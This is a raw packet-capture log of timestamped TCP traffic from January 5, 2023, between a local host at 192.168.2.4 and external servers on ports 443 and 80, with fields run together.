                                                                                                                                                                                    Jan 5, 2023 08:58:27.304735899 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.304812908 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.304892063 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.304936886 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.305001974 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.305032015 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.342941999 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343085051 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343123913 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343157053 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343182087 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343264103 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343280077 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343298912 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343350887 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343384027 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343453884 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.343496084 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.380987883 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.381129980 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.381400108 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.381522894 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.381623983 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.381724119 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.381923914 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.382009029 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.382177114 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.382275105 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.382438898 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.382538080 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.419575930 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.419727087 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.419747114 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.419776917 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.419840097 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.419883966 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.420650005 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.420747042 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.420938969 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421029091 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421220064 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421314001 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421618938 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421710014 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421853065 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.421936035 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.422192097 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.422282934 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.422472954 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.422559977 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.422787905 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.422890902 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.423051119 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.423178911 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.423273087 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.423353910 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458492041 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458638906 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458677053 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458731890 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458800077 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458806038 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458817959 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458834887 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458885908 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.458911896 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459018946 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459125042 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459235907 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459325075 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459342003 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459386110 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.459446907 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.466324091 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.466387987 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:27.466433048 CET49739443192.168.2.495.217.49.230
                                                                                                                                                                                    Jan 5, 2023 08:58:27.466458082 CET4434973995.217.49.230192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.248119116 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.248183012 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.265604019 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.265644073 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.340053082 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.340110064 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.340415955 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.358778954 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.358894110 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.376296997 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.376353979 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454634905 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454754114 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454823017 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454885960 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454899073 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454948902 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.454952002 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455010891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455073118 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455126047 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455132008 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455178976 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455193043 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455249071 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455317974 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455377102 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455379963 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.455432892 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.506829977 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.506892920 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.506961107 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.506990910 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507021904 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507086992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507128954 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507131100 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507198095 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507255077 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507262945 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507314920 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507337093 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507395983 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507463932 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507472992 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507529020 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507585049 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507596016 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507666111 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507726908 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507730007 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507798910 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507858992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507910013 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507920027 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507966042 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.507980108 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508038044 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508100986 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508148909 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508161068 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508209944 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508222103 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508287907 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508344889 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.508394957 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561077118 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561146021 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561211109 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561223030 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561269045 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561328888 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561340094 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561388016 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561395884 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561454058 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561511040 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561563969 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561604977 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561625957 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561630011 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561685085 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561753035 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561773062 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561820984 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561887980 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561953068 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.561958075 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562028885 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562077999 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562086105 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562144995 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562146902 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562210083 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562267065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562324047 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562329054 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562381029 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562388897 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562452078 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562513113 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562566042 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562572002 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562617064 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562634945 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562719107 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562797070 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562850952 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562858105 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562902927 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562916040 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.562987089 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563047886 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563056946 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563119888 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563180923 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563235044 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563241959 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563308954 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563357115 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563374996 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563419104 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563441992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563483000 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.563940048 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564006090 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564014912 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564054012 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564068079 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564131975 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564186096 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564199924 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564265013 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564336061 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564380884 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564409018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.564635038 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.613960981 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614082098 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614145041 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614212990 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614248991 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614279032 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614289999 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614336967 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614391088 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614398956 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614454031 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614505053 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614556074 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614568949 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614619017 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614626884 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614685059 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614784002 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614839077 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614847898 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614895105 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614914894 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.614974022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615022898 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615073919 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615087032 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615133047 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615149021 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615211010 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615272045 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615340948 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615385056 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615395069 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615398884 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615458012 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615520000 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615575075 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615581036 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615632057 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615639925 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615703106 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615751982 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615799904 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615816116 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615859985 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615863085 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615931034 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.615991116 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616038084 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616038084 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616085052 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616101027 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616159916 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616223097 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616277933 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616285086 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616336107 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616353035 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616414070 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616477966 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616525888 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616539001 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616591930 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616597891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616661072 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616723061 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616774082 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616785049 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616832972 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616847038 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616909981 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.616966963 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617022038 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617026091 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617083073 CET4973780192.168.2.4188.114.97.3
